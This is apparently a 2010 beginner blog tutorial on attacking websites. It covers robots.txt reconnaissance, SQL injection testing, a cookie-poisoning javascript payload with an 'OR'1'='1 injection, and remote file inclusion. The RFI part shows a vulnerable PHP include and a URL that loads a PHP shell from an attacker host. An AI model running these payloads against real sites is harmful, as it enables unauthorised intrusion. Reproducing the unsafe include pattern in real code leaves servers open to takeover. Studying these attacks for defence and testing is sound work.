Wednesday, December 1, 2010

How to Hack Websites & pentesting websites [basic]


how to pentesting web.
for n00b..

1. Check for robots.txt
Most common directory is
Code:
http://www.site.com/robots.txt

This can contain lots of info, even though not all sites have it. It can normally indicate where the admin directory is too.
robots.txt is used to restrict the Google bot's access in certain parts of a forum or a website.

It looks like this:
Code:
User-agent: *

Disallow: /forum/admin.php
Disallow: /forum/moderator.php
Disallow: /forum/include.php


2. Check for SQL Injection vulnerabilities
This is done by putting a ' (apostrophe) in the end.
Like this:
Code:
http://www.victim.com/news.php?id=1'

If you see some kind of an error, then most likely, the site is vulnerable.
This is classic, or error based SQL Injection. We'll discuss blind SQL injection another time.

3. Cookie poisoning
Even though most sites nowadays filter this, it wouldn't kill you to try.
We will do this...with javascript.
It's really simple, try this in the address bar:
Code:
javascript:alert(document.cookie);

In some cases this may spill out your username and password.
This is the part where you try the famous line...
Code:
javascript:void(document.cookie="username='OR'1'=' 1"); void(document.cookie="password='OR'1'='1");

Similar to SQL injection, you guessed it.


4. Check if site is vulnerable to Cross Site Script (XSS)
XSS and javascript together open up a huge horizon of possibilities and a whole lot of new places to discover.
Check if the site is vulnerable by typing this in a webform or something.
Code:


If site is vulnerable, then you will get a popup message saying awdwdadwd (yes this was random).
You can find more detailed articles on XSS on milw0rm or something.


5. Remote File Inclusion (RFI)
RFI or Remote File Inclusion is where the attacker tries to inject his own PHP code to your PHP apps...and if he's successful, then he can do whatever he wants on the server.
Ok, so, lets say we have a website coded in PHP and it uses something like page=page.html to see which page is to be displayed. The code will look something like this
Code:
$file =$_GET['page']; //ourpage
include($file);
?>

What this means is, whatever gets passed to page, it will get included inside the PHP page. Goes like this:

Code:
http://www.victim.com/contact.php?page=http://www.attacker.com/phpshell.txt?

The actual code the webserver is executing looks like this:
Code:
$file ="http://www.attacker.com/phpshell.txt?"; //$_GET['page'];
include($file); //$file is the PHP shell
?>

We just executed our code on our targeted server.
Well this was all folks, hope you enjoyed

It's beginner stuff, and I'm not going in detail till later -- I will post more tutorials targeted at a certian type of web hacking such as SQL injection or RFI to teach you how to do it.

No comments:

Template by : mhiman@ hacker-newbie.org